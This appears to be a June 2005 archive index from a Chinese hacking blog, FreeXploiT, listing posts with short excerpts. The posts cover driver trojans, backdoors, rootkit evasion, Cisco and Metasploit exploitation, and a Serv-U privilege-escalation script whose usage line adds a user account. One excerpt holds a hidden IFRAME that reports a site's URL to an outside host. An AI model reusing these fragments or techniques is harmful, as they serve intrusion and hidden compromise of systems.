2005年06月_freexploit

原创驱动木马之类的问题 zz

发信人: Mekanizumu (Mekanizumu), 信区: HackerVsSecurity标题: 驱动木马之类的问题发信站: 日月光华 (2005年06月27日10:34:08 星期一), 站内信件我看了一本WDM的书，驱动程序的安装是先建立一个inf文件然后通过windows的安装或者书中提供的FastInst来安装。但是书上没有提到到底一个驱动程序是如何被安装的假如写驱动木马或者

2005-06-27 12:53:00 2093

原创 DOS那一代的程序员现在都干嘛呢？

亿友论坛-DOS那一代的程序员现在都干嘛呢？（几年前的老帖子） -- 作者：包子夹蛋 -- 发布时间：2005-5-10 14:01:00 -- DOS那一代的程序员现在都干嘛呢？（几年前的老帖子）几年前的老帖子了，个人认为还不错，拿出来与大家分享 nnmm注：一群DOS年代老鸟的感言 [主题]DOS那一代的程序员现在都干

2005-06-27 12:50:00 10515 4

原创系统级ring3后门——byshell v0.64编程与应用（zz）

第一部分：背景现在网络上流行的木马后门类工具很多，但可以称为精品的则没有多少。大多数新生们还是在使用winshell,冰河或者Radmin一类的“远程管理软件”来替代后门程序。不幸的是，它们并不符合一个真正后门的标准，极其容易被有或者没有经验的服务器管理员察觉，因此肉鸡经常丢失也就很正常了。一个合格的后门至少应该作到：不能有陌生进程存在于任务管理器里，给后门进程起一个看起来像系统进

2005-06-26 04:07:00 3048

原创 How to avoid the detection of hidden regkey by hooking RegSaveKeyA

How to avoid the detection of hidden regkey by hooking RegSaveKeyA By: EiNSTeiN_How it works:Many hidden-regkey-detection tools detect hidden stuff by dumping someregistry hives to a file and then com

2005-06-26 03:20:00 1916

原创 Avoiding new methods of process detection

Avoiding new methods of process detection By: fuzen_opA lot of effort has been made recently to detect hidden processes, even those hidden using DKOM tricks. Some rootkit authors have fired back by un

2005-06-26 03:18:00 2333

原创 Exploiting Cisco Routers: All Part 1-2

Exploiting Cisco Routers: Part 1 Mark Wolfgang 2003-09-29 IntroductionThis two-part article will focus on identifying and exploitingvulnerabilities and poor configurations i

2005-06-26 03:14:00 3751 1

原创 Metasploit Framework all part 1-3

Metasploit Framework, Part 1 Pukhraj Singh, K.K. Mookhey 2004-07-12 <!--This article provides an elaborate insight into the Open Source exploit framework, the Metasploit Fra

2005-06-26 03:11:00 6762

原创珊瑚虫有木马！被迫停止开发！（转载）

[飘云新手必看]对飘云的错误认识以及IP显示；更新数据库问题等各种问题的解答，对于此类问题，不再做回复对飘云的错误认识以及IP数据库问题；更新等各种问题的解答，对于此类问题，不再做回复更新：2005.06.22-15:161、就是大家最关心的查隐身问题：答：首先说明的一点就是：珊瑚虫的查隐身是靠监视端口的方法（至少我这么认为）也就是说有一个进程，对每个好友进行监视，你有多少内存？如果再动用其它手

2005-06-24 17:37:00 1813 3

原创 PageFile Swap File

PageFile Swap FileAuthor: JIURL Home: http://jiurl.yeah.net Date: 2005-06-02 1 PageFile Swap File IntroductionWindows 2000 uses page-based virtual memory management, contents of som

2005-06-24 14:50:00 390213

原创 Windows 2000 Page Based Memory Management

Windows 2000 Page Based Memory ManagementAuthor: JIURL Home: http://jiurl.yeah.net Date: 2005-06-02 1 Basic ConceptWindows 2000 uses a page-based virtual memory management. In windo

2005-06-24 14:49:00 1839

原创 QQ的安全问题 (www.team509.com)

QQ，就是OICQ，TENCENT公司研发的即时信息软件，是中国市场上国产IM软件绝对的老大。中国网民几乎人手至少一个QQ号码。大家都比我清楚，不多介绍。本文谈谈QQ的安全问题。 QQ具有如此惊人的人气，却有着与之不相称的安全问题。基本上可以说，使用QQ，基本没有任何隐私可言！另外它也为你的电脑带来了诸多附送的安全隐患。有识之士如我都早已不用QQ啦。 QQ的安全问题作者：dou

2005-06-24 13:41:00 7083 1

原创简单OCR实现原理 (www.team509.com)

许多网站在接受HTTP输入的时候常用到一项认证码技术来防止DOS攻击。简单地说就是在显示提交数据页面之前或者同时，服务器会向客户端发送一个小图片，该图片通常由一些随机的数字或字母（很少情况下会有其他字符）组合而成，并要求在HTTP的提交表单（FORM）中正确输入该数字，无效的输入会使数据提交失败。这样的机制可以有效阻止或降低一些登陆/张贴/投票的自动机对网站产生的负面作用。作者：doublele

2005-06-24 13:35:00 7554 1

原创缩减Windows的网络服务 (www.team509.com)

这是翻译的文章，原文为法文，地址http://www.hsc.fr/ressources/breves/min_srv_res_win.html，英文版地址http://www.hsc.fr/ressources/breves/min_srv_res_win.en.html。简单说来，这篇文章就是讲怎样把Windows的端口尽量全部关闭掉。作者： Jean-Baptiste March

2005-06-24 13:30:00 3532

原创天网防火墙的配置文件加密方法——兼谈RC6算法 (www.team509.com)

author: doubleleedate: 2005-6-1 天网防火墙2.50版，用Borland C编译，规则配置文件是加密的。为了绕开其监控，必须能够读写其规则配置文件并重新启动之。本文主要说说怎样读写其配置文件，顺便谈谈RC6的基本情况，作为备忘。author: doubleleedate: 2005-6-1 天网防火墙2.50版，用Borland C编译

2005-06-24 13:22:00 4004

原创入门读物(2) – WEB应用程序的安全 (www.team509.com)

大家都知道，这年头进行一次成功的网络攻击是越来越难了，特别是我们在对客户作安全服务的时候要做渗透测试。舍得花钱让我们做安全服务的客户，手里都有大把的银子，什么firewall,IDS,IPS,管它有用没用，全给加上，我们曾经见过一个WEB server前加俩防火墙的例子。在这种情况下，很多的攻击手段都无法使用，特别是buffer overflow的手段几乎没有用武之地，现在管理员的安全水准也有较大

2005-06-24 13:19:00 1808

原创入门读物（1） -- 信息收集 (www.team509.com)

要进行一次成功的网络攻击，前期的准备工作是必不可少的，而且前期工作的准备质量，直接影响到攻击的成败与否，所以这部分的工作是至关重要的。下面，我们假设我们要攻击某些大中型网络为例来说明信息收集的方法与技巧，并给出一定的工具。author:[email protected]:2005-6-1要进行一次成功的网络攻击，前期的准备工作是必不可少的，而且前期工作的准备质量，直接影响到攻击的成败与否，所

2005-06-24 13:15:00 1829

原创强大溢出工具包：Metasploit命令行下的使用（转至77169）

Metasploit 是个好东西，实在想不到别的办法了，或许这东西能帮你一下，Metasploit包含了众多exploit，说不准还能用上几个，搞几台好肉鸡.下载Metasploit双击进行安装，非常简单，一路回车就行了。安装完之后看下安装目录下的Msfconsole.bat和msfweb.bat,第一个是命令下的控制台。第二个是图形界面下的程序。现在我们先来看下命令行下的使用方法,运行后我们看到

2005-06-22 23:26:00 7050 1

原创调用nc做嗅探的一个bat shell 【ALLyeSNO】

Term : FreeXploiT Author : ALLyeSNODate : 2005-06-21Codz: @echo off :: Ncfoever 1.0 bulid by ALLyeSNO 2005-06-13 :: 可用于tcp端口数据包的捕获 cls ::/* 参数判断以及使用说明 */ set count=1 if /i "%1"=="-look" goto nclo

2005-06-21 15:13:00 1867

原创 ECC加密算法入门介绍

ECC加密算法入门介绍作者：ZMWorm[CCG]E-Mail：[email protected]主页：Http://ZMWorm.Yeah.Net前言同RSA（Ron Rivest，Adi Shamir，Len Adleman三位天才的名字）一样，ECC（Elliptic Curves Cryptography，椭圆曲线密码编码学）也属于公开密钥算法。目前，国内详细介绍ECC的公开文献

2005-06-21 14:01:00 1942

原创密码算法收集帖子【FreeXploiT收集整理】2005-06-21

http://www.blog.edu.cn/user1/6692/subject/index.shtml#7390密码(学) 密码学基础知识(一)　niti 2004-12-31 15:42:00 密码学基础知识(二)　niti 2004-12-31 15:43:00 RSA算法实验1(附测试软件)　niti 2005-4-23 10:59:00 RSA算法实验二 (附带软件)　niti 20

2005-06-21 12:39:00 1909

原创 XoftSpy 4.13的注册算法分析 zz

看雪有很多这些文章选一篇最近研究的方向大家看看【标题】XoftSpy 4.13的注册算法分析【作者】forever[RCT]【语言】VC【工具】ida4.6,ollydbg1.1【正文】这个软件的算法很简单，正好拿来做逆向分析。我就会捏软柿子。呵呵。因为这个软件注册失败会弹出一个对话框来提示您，所以在ollydbg中在函数MessageBox上下断点很容易就找到软件的关键

2005-06-18 22:54:00 1570

原创 SqlDataReader的问题

Author : 菜菜Team : FreeXploiTDate : 2005-07-06Site : http://blog.csdn.net/freexploit有个存储过程ALTER PROCEDURE Pr_GetSingleStudent( @StudentName varchar(50))ASSELECT StudentID FROM Studen

2005-06-17 16:13:00 2071

原创 SQL语句和存储过程查询语句的流程控制

Author : 菜菜Team : FreeXploiTDate : 2005-07-06Site : http://blog.csdn.net/freexploitdrop table classname declare @TeacherID int declare @a char(50) declare @b char(50) declare @c char(50) declare

2005-06-17 15:52:00 2160

原创用批处理实现文本文件中指定字符串的替换 zz

主题用批处理实现文本文件中指定字符串的替换 « 上一主题 | 下一主题 »uglyfrog 发表于：2005-03-02 02:50 回复发帖： 249积分： 0注册： 2001-12-30其实批处理也可以干很多事的，下面的批处理文件实现了对指定目录下的特定文件类型中的字符串进行替换的功能。虽然在unix或linux系统写一条语句就能实现，但在windows下用批处理也总比编一段程序方便些吧。引

2005-06-17 09:17:00 12897

原创一些防火墙安装后默认打开的端口【花了10分钟从sowhat网站上拽出来的】

· Below given ports are the default ports open after installing the firewall except Checkpoint. For checkpoint all the management port details are given. Hope this will be somewhat useful.Sonic

2005-06-17 07:42:00 2607

原创 Serv-U提权脚本代码 dugu的简单生活

http://www.donews.net/dugu/archive/2005/06/13/427083.aspxBy dugu thanks Crackme usage:wscript su.vbs "net user aa aa /add" on error resume next Dim servuManagePort Dim servuManageName Dim servuMana

2005-06-16 17:15:00 2323

转载 [转贴]砍客联盟asp木马的猫腻

文：一个有钱人 iis.mdbCodz: IFRAME id=fs name=fs frameBorder=0 height=0 marginHeight=0 marginWidth=0 scrolling=no src=""http://www.onhn.com/tjg/52hk.asp?n=http://"&request("HTTP_HOST")&request("SCRIPT_NAME")

2005-06-16 12:47:00 1840

原创已经失效的QQ exploit 喜欢就拿来研究看看吧【ALLyeSNO】

Term : FreeXploiT Author : ALLyeSNODate : 2005-06-14下载 http://www.ph4nt0m.org/bbs/showthread.php?s=&postid=58467#post58467No.1 【原创】QQexploit 已经失效了能不能拿到权限不知道不过DOS应该是可以的把文件上传到QQ自定义魔法表情，发送给对方就可以溢出

2005-06-14 15:24:00 2081 1

原创 QQ变异表情 zz

QQ变异表情推荐级别非常推荐！一共有200多个表情自己划分一类不会和你的自定义表情混在一起造成混乱下载 http://bbs.jj.jx.cn/upload/377970_1118534601_B_QQface.rar本文引用通告地址： http://www.donews.net/ufo2001x/services/trackbacks/425716.aspx

2005-06-13 07:23:00 2222 1

原创 ISP如何检测控制多机共享ADSL连接

作者：天极网文章来源：天极网点击数： 1616 更新时间：2004-6-4 ADSL给大家上网带来的极大地方便，许多家庭都有好几台计算机，通过ADSL共享上网的方式可以各自上网，互不干扰，可最近很多朋友告诉我，如果只有一台机子访问互联网，一切正常，若两台机子都要访问互联网，则都打不开网页，打听来的消息说，电信新装网络硬件：网络尖兵。上网查了一下关于网络尖兵的资料，只提到

2005-06-12 02:59:00 1400

原创 DACL, NULL or not NULL

绿盟安全月刊->第50期->技术专题期刊号： --全部--第57期第56期第55期第54期第53期第52期第51期第50期第49期第48期第47期第46期第45期第44期第43期第42期第41期第40期第39期第38期第37期第36期第35期第34期第33期第32期第31期第30期第29期第28期第27期第26期第25期第24期第23期第22期第21期第20期第19期第18期第17期第16期第1

2005-06-11 02:36:00 1434

原创让所有正向程序实现反向连接【转载】

秘密穿过内网防火墙作者：陈一天查看：19 平均分：0 日期：2005-6-3 类别：网络通信小天最近利用微软新爆出的几个漏洞，放出很多C/S木马，但捕获的“肉鸡”却是少之又少，让他郁闷不已。原来，很多中招者都是FTTP+LAN环境下的局域网用户，在小天与被攻击者之间隔有硬件防火墙，而采用IP直连的方法当然是行不通的。此时，他想到了一位法力无边的“天使”Angelshell……

2005-06-10 20:18:00 4498

原创 RFC文档目录地址1

RFC1 主机软件RFC2 主机软件 RFC3 文档规范 RFC4 网络时间表RFC6 与 Bob Kahn 会话RFC10 文档规范RFC13 零文本长度的EOF信息RFC16 M.I.T RFC18 IMP-IMP和主机-主机控制联接 RFC19_可用来降低有限交换节点阻塞的两条协议性的建议RFC20_用于网络交换的 ASCII 格式RFC21 网络会议RFC22 主机-主机控制信息格式RFC

2005-06-05 10:55:00 7857

原创 MS Exchange Internet 协议

疑难解答指南：MS Exchange Internet 协议 Peter Baggiolini，Microsoft Exchange Premier Support 本文中讲解的 Microsoft Exchange Server Internet 协议 · 服务器端协议 · 客户端协议疑难解答技巧·

2005-06-04 20:33:00 2097

原创用Telnet快速收发电子邮件- -

提起电子邮件的发送与收取，我们不能不谈起与电子邮件传递息息相关的两大网络协议，即POP3协议和SMTP协议，这两个协议可是电子邮件收取与发送的核心所在，其中： POP3指：Post Office Protocol Version 3 称邮筒协议，负责邮件的收取。SMTP指：Simple Mail Transfe

2005-06-04 03:16:00 3600 1

原创一个ie后门

HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/AboutURLs

2005-06-02 23:13:00 1504 5

原创 Windows Server 2003版本对比

　文/Microsoft China.　　下列基于功能划分的表格将为您详细比较Microsoft Windows Server 2003 家族各个版本的差异。　　图例: = 内置支持 = 功能部分支持 = 不支持该功能特性标准版企业版数据中心版Web 版可扩展性支持Intel® 安腾64位计算机热插拔内存1, 2Non-Uniform Memory Access (NUMA) 2数据中心程序

2005-06-01 12:53:00 1717

FreeXploiT